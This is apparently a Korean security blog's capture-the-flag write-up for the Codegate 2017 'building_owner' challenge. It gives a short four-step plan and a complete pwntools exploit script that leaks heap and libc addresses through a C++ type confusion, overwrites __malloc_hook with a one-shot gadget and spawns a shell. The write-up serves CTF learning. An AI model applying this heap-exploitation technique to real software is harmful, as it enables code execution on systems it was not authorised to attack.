cdor1's lab
Codegate 2017 building_owner 본문
Type confusion
c++분석하느라 애먹었다 ㅠㅠㅠ
root@noe:~/pwnchal# ./checksec.sh --file noe.systems/owner
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH noe.systems/owner
1. Apartment에서 Restaurant로 type change해서 fd, bk leak
2. pointer 이용해서 main_arena+88 leak
3. pointer 이용해서 malloc_hook overwrite
4. get shell
from pwn import *
s = process('./owner')
def add(name, floor, house, some):
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('name?')
s.sendline(name)
print s.recvuntil('How many floor on your apartment? ')
s.sendline(str(floor))
print s.recvuntil('How many house in each floor? ')
s.sendline(str(house))
print s.recvuntil('Describe something about it : ')
s.sendline(some)
def edit(edit_type, edit_number): # -1 -1
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline(str(edit_type))
print s.recvuntil('> ')
s.sendline(str(edit_number))
def change(change_type, change_number, change_kind): # -1 -1
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('> ')
s.sendline('2')
print s.recvuntil('> ')
s.sendline(str(change_type))
print s.recvuntil('> ')
s.sendline(str(change_number))
print s.recvuntil('> ')
s.sendline(str(change_kind))
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('-1')
add('A'*8, 1, 1, 'A'*8)
raw_input()
add('B'*8, 1, 1, 'B'*8)
change(1, 1, 2)
edit(3, 1)
print s.recvuntil('Normal price of menu : ')
heap_leak = int(s.recvuntil('\n')[:-1])
heap_for_leak = heap_leak + 0x1e0
log.info('heap_leak : ' + hex(heap_leak))
log.info('heap_for_leak : ' + hex(heap_for_leak))
print s.recvuntil('> ')
s.sendline('6')
print s.recvuntil('Enter normal price of menu : ')
s.sendline(str(heap_for_leak))
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('Enter new name : ')
s.sendline('A' * 0x100)
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('1')
#print s.recvuntil('>').encode('hex')
print s.recvuntil('1. ')
libc_leak = u64(s.recv(6).ljust(8, '\x00'))
libc_base = libc_leak - 3939160
malloc_hook = libc_base + 3939056
oneshot = libc_base + 0x45526
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('malloc_hook : ' + hex(malloc_hook))
log.info('oneshot : ' + hex(oneshot))
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('6')
print s.recvuntil('menu : ')
s.sendline(str(malloc_hook))
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('name : ')
s.sendline(p64(oneshot))
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('-1')
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('> ')
s.sendline('5')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| IDEA (0) | 2017.06.08 |
|---|---|
| RCTF RNote (0) | 2017.05.26 |
| NOE - Pwnable problem scenario (0) | 2017.05.23 |
| C++ Exploitation (0) | 2017.05.19 |
| pwnable.tw silver_bullet (0) | 2017.05.17 |
'Security/Pwnable' Related Articles
more
Comments